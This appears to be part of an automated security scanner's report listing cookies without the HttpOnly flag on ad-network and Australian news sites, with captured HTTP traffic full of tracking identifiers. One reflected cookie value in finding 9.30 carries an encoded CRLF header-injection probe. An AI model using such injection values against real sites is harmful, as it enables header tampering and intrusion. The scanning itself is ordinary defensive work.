Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FSQTS044=pctl=304960&pctm=2&pctc=39385&FL304960=2&FQ=2&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=2; expires=Fri, 07-Oct-2011 14:20:56 GMT; domain=.adsfac.us; path=/
FSQTS044304960=uid=15629228; expires=Thu, 08-Sep-2011 14:20:56 GMT; domain=.adsfac.us; path=/
UserID=983108392662652; expires=Fri, 07-Oct-2011 14:20:56 GMT; domain=.adsfac.us; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ag.asp?cc=QTS044.304960.0&source=js&ord=1570906 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 1040
Content-Type: text/javascript
Expires: Wed, 07 Sep 2011 14:19:57 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSQTS044=pctl=304960&pctm=2&pctc=39385&FL304960=2&FQ=2&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=2; expires=Fri, 07-Oct-2011 14:20:56 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSQTS044304960=uid=15629228; expires=Thu, 08-Sep-2011 14:20:56 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652; expires=Fri, 07-Oct-2011 14:20:56 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 07 Sep 2011 14:20:56 GMT
Connection: close

if (typeof(fd_clk)=='undefined'){var fd_clk = 'http://adsfac.us/link.asp?cc=QTS044.304960.0&CreativeID=39385';}if(fd_clk.toLowerCase().indexOf('&creativeid=')!=-1){}else{fd_clk += '&CreativeID=39385'}
...[SNIP]...

9.10. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

guest_id=v1%3A13154049095134771; domain=.twitter.com; path=/; expires=Sat, 07 Sep 2013 02:15:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.11. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.news.yahoo.com
Path:	/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

au_yloc=f_x5G1oWMpdaG8g_v7YfqdaDjDY92tkMKmLVvpwWykNLAJnRkDKXFk.DhINol4ybNtevxIZvvU9KJaDDoqE.YsgIpC3Xt0KkS2U.BBiNQ2mme_plYVEQtW2WpxAlp26H9Gz_pUlrkvp65TC0KDFkPAQ.hS_UXBmfhrRwAT9LrRi49tvQKiUfux504Bf7ozIwgrmvOJmnqjVlSS98_hoeHDgGDMoGrJkK3hNysRnvplpVDm0H5YIZC1gNRkOLsf7EPpEERY0s5_gBxRXK6V07s_XX2U_Td0Yu9.65dj824B6k3B5FFkncG3NMTXbzB0zQKCEnXwik5yvYdWGk6AkntYyJHyfQYWbnCCdjc9SkW2GSOeNBwvIHVsqJkJU0N9VFhy45PZUqhqaCYnFbtL.gwwYFvGyJXmoEAD2hLTgkskCP8aMjV7T7ow93kCgOrtvL3x27l_kjQW4YhVAZ9m5oylZKENTlJdA9zkFOewzpEAuFaPwzDerLSRPeY15ytANwy2IwzGrnx2WEYLAhzc6IOcm51hrTwnC5_lAfWvq416wqsjb41xM6x_RwGTi6qp8FynuRDn9Ho_4YoWHpBkSm1Db0WpssSx_j3MTpPtHIvGWtNsye2EUS0cp9XJOcV72hC2ABujbmPqq65nyVbFhLIliEMTZliPT5mivrhgv8CW2Gwg33filws8FDRpsuY_QjO8yHzcCA.Ebxx4oVnrjgMB3wRWMFtIdneV.kQ3NRULYXn.fyX1JXZ4iTyPZh1IGDA5Nm7pTNmQrpATFt; expires=Tue, 06-Dec-2011 14:15:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/ HTTP/1.1
Host: au.news.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

9.12. http://au.news.yahoo.com/thewest/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.news.yahoo.com
Path:	/thewest/business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

au_yloc=f_x5G1oWMpdaG8g_v7YfqdaDjDY92tkMKmLVvpwWykNLAJnRkDKXFk.DhINol4ybNtevxIZvvU9KJaDDoqE.YsgIpC3Xt0KkS2U.BBiNQ2mme_plYVEQtW2WpxAlp26H9Gz_pUlrkvp65TC0KDFkPAQ.hS_UXBmfhrRwAT9LrRi49tvQKiUfux504Bf7ozIwgrmvOJmnqjVlSS98_hoeHDgGDMoGrJkK3hNysRnvplpVDm0H5YIZC1gNRkOLsf7EPpEERY0s5_gBxRXK6V07s_XX2U_Td0Yu9.65dj824B6k3B5FFkncG3NMTXbzB0zQKCEnXwik5yvYdWGk6AkntYyJHyfQYWbnCCdjc9SkW2GSOeNBwvIHVsqJkJU0N9VFhy45PZUqhqaCYnFbtL.gwwYFvGyJXmoEAD2hLTgkskCP8aMjV7T7ow93kCgOrtvL3x27l_kjQW4YhVAZ9m5oylZKENTlJdA9zkFOewzpEAuFaPwzDerLSRPeY15ytANwy2IwzGrnx2WEYLAhzc6IOcm51hrTwnC5_lAfWvq416wqsjb41xM6x_RwGTi6qp8FynuRDn9Ho_4YoWHpBkSm1Db0WpssSx_j3MTpPtHIvGWtNsye2EUS0cp9XJOcV72hC2ABujbmPqq65nyVbFhLIliEMTZliPT5mivrhgv8CW2Gwg33filws8FDRpsuY_QjO8yHzcCA.Ebxx4oVnrjgMB3wRWMFtIdneV.kQ3NRULYXn.fyX1JXZ4iTyPZh1IGDA5Nm7pTNmQrpATFt; expires=Tue, 06-Dec-2011 14:17:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thewest/business/ HTTP/1.1
Host: au.news.yahoo.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; au_yloc=f_x5G1oWMpdaG8g_v7YfqdaDjDY92tkMKmLVvpwWykNLAJnRkDKXFk.DhINol4ybNtevxIZvvU9KJaDDoqE.YsgIpC3Xt0KkS2U.BBiNQ2mme_plYVEQtW2WpxAlp26H9Gz_pUlrkvp65TC0KDFkPAQ.hS_UXBmfhrRwAT9LrRi49tvQKiUfux504Bf7ozIwgrmvOJmnqjVlSS98_hoeHDgGDMoGrJkK3hNysRnvplpVDm0H5YIZC1gNRkOLsf7EPpEERY0s5_gBxRXK6V07s_XX2U_Td0Yu9.65dj824B6k3B5FFkncG3NMTXbzB0zQKCEnXwik5yvYdWGk6AkntYyJHyfQYWbnCCdjc9SkW2GSOeNBwvIHVsqJkJU0N9VFhy45PZUqhqaCYnFbtL.gwwYFvGyJXmoEAD2hLTgkskCP8aMjV7T7ow93kCgOrtvL3x27l_kjQW4YhVAZ9m5oylZKENTlJdA9zkFOewzpEAuFaPwzDerLSRPeY15ytANwy2IwzGrnx2WEYLAhzc6IOcm51hrTwnC5_lAfWvq416wqsjb41xM6x_RwGTi6qp8FynuRDn9Ho_4YoWHpBkSm1Db0WpssSx_j3MTpPtHIvGWtNsye2EUS0cp9XJOcV72hC2ABujbmPqq65nyVbFhLIliEMTZliPT5mivrhgv8CW2Gwg33filws8FDRpsuY_QjO8yHzcCA.Ebxx4oVnrjgMB3wRWMFtIdneV.kQ3NRULYXn.fyX1JXZ4iTyPZh1IGDA5Nm7pTNmQrpATFt

Response

9.13. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633; expires=Fri, 06-Sep-2013 14:14:17 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.14. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Sat, 01-Sep-2012 14:16:01 GMT; Path=/
pb_rtb_ev="1:535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Thu, 06-Sep-2012 14:16:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:38 GMT; path=/
ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:16:54 GMT; path=/
70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
54069056=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.18. http://cm.au.thewest.overture.com/js_flat_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.au.thewest.overture.com
Path:	/js_flat_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDEyNjEzNXc0cAN9RMwAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sat, 04-Sep-2021 14:15:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.19. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFgeo=5386156;expires=Thu, 06 Sep 2012 14:14:20 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.20. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/130511/0/vj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

i=202013Ji03cHD3JhX00001N816qkP20GX142872422_84859000003JPq; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:14:18 GMT; Path=/servlet/ajrotator/track/pt63689
ajcmp=20236X0003BIY; Expires=Fri, 06-Sep-2013 14:14:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.21. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/80617/0/vj

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=202013Ji03PQd3JhX00001N816qkP20FX132910139_5124900003Djv; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:17:27 GMT; Path=/servlet/ajrotator/track/pt63689

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Set-Cookie: i=202013Ji03PQd3JhX00001N816qkP20FX132910139_5124900003Djv; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:17:27 GMT; Path=/servlet/ajrotator/track/pt63689
Content-Type: application/x-javascript
Content-Length: 377
Date: Wed, 07 Sep 2011 14:17:27 GMT
Connection: close

document.write("<"+"iframe src=\"http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/cj/V121145851DJ-573I706K63342132
...[SNIP]...

9.22. http://i.w55c.net/a.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/a.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:06 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.23. http://i.w55c.net/m.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/m.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.24. http://i.w55c.net/m_yahoo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/m_yahoo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F82e0303e4a9098b0c77927fc;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:44 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.25. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:14:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.26. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PUBRETARGET=78_1409703834.82_1409705283.571_1410012888; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.27. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588ddc890c2ebd61ea165; expires=Wed, 07-Sep-2011 15:20:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^12&12590^77; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63579; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.28. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=12338^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63947; path=/; domain=.rubiconproject.com
csi15=3212309.js^1^1315404852^1315404852&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-15.js?cb=721461&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7725/12338; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

9.29. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=04e8588ddfde552dd9c270269; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=12338^10&12590^103; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63812; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.30. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:17:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=12338^6&12590^2568bf%250d%250ae6d071c9e42; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63764; path=/; domain=.rubiconproject.com
csi2=3165011.js^3^1315404895^1315405035&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; expires=Wed, 14-Sep-2011 14:17:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.31. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22678-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^19&12590^14; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63324; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22678-15.js?cb=9938969&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; 